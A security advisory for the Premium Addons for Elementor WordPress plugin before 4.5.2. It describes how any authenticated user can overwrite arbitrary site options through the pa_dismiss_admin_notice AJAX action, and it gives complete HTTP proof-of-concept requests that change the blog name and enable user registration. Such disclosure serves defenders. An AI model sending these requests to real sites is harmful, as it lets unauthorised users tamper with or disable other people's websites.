Premium Addons for Elementor < 4.5.2 – Subscriber+ Arbitrary Blog Option Update

Description

The plugin does not have any CSRF and authorisation checks in the pa_dismiss_admin_notice AJAX action, available to any authenticated users, and do not validate the option key to ensure the option to update belongs to the plugin. As a result, any authenticated user, such as subscriber can update arbitrary WordPress options and set them to the value '1'. An attacker changing the users_can_register would enable users registration, other options could be changed to make the blog unusable as well.

Proof of Concept

Change the Blogname to '1'

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 46
Cookie: [any authenticated user]
Connection: close

action=pa_dismiss_admin_notice&notice=blogname


To enable registration:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 46
Cookie: [any authenticated user]
Connection: close

action=pa_dismiss_admin_notice&notice= users_can_register